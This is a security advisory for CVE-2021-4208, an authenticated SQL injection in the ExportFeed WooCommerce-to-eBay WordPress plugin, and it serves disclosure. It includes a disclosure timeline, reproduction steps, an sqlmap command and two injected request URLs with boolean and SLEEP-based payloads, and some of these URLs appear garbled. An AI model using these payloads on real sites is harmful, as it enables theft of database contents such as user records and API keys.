CVE-2021-4208 SQL Injection vulnerability in 'ExportFeed: List WooCommerce Products on eBay Store' plugin

CVE-2021-4208

CVSS: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

https://wordpress.org/plugins/exportfeed-list-woocommerce-products-on-ebay-store/#description

https://wpscan.com/vulnerability/0cf63b44-f709-4ba4-be14-1eea934c2007

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4208

Disclosure Timeline

Nov 21, 2021: Issue Identified and Disclosed to WP plugin team

Nov 22, 2021 : Got auto reply and Plugin Closed

December 27, 2021: Submitted to Mitre for cve

January 20, 2022: Got reply from Mitre saying to ping Wpscan, pinged Wpscan

January 21, 2021 : CVE Assigned CVE-2021-4208

February 21, 2022: CVE Published in NVD

February 28, 2022: CVE updated with score

Description:

The ExportFeed: List WooCommerce Products on eBay Store plugin 2.0.1.0 uses a `product_id` POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.

SQL injection vulnerability in fetch_product_ajax.php in Exportfeed List WooCommerce Products on eBay Store Wordpress plugin 1.1.0 through 2.0.1.0 allows authenticated attackers to execute arbitrary SQL commands via the product_id POST parameter.

We can see the problematic code in fetch_product_ajax.php

This vulnerability is present in the current version of the plugin 2.0.1.0 and appears to also be present back to version 1.1.0. Administrative access is required to access the vulnerable functionality.

Link to plugin:

https://wordpress.org/plugins/exportfeed-list-woocommerce-products-on-ebay-store/#description

Steps to reproduce:

  1. Log into WordPress as the admin user
  2. Install WooCommerce and 'ExportFeed: List WooCommerce Products on eBay Store' plugins
  1. Perform initial config for the WooCommerce plugin and create a product
  1. Perform initial config for the ExportFeed plugin and create an eBay Connect (Create Feed will not work without this)
  1. In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
  1. Modify the original request parameters so we hit the appropriate functionality

 

Original request:

Modified request:

&q=savep&local_cat_ids=1&product_id=1

  1. Save the request to a file, post.txt
  1. Run sqlmap to pull the current user

sqlmap -r post.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session

https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/Wp/fetch_product_ajax.phpaaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&1imit=0,105q=savepalocal_cat_ids=18product_id=1 AND 3082:3082

https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.phpfiaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySellerashowOutofStock=lalimit=0,108q=savepfilocal_cat_ids=1&product_id=1 AND (SELECT 9979 FROM (SELECT(SLEEP(5)))Ing)

Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the ebay connection this plugin uses, WordPress users,  and so on.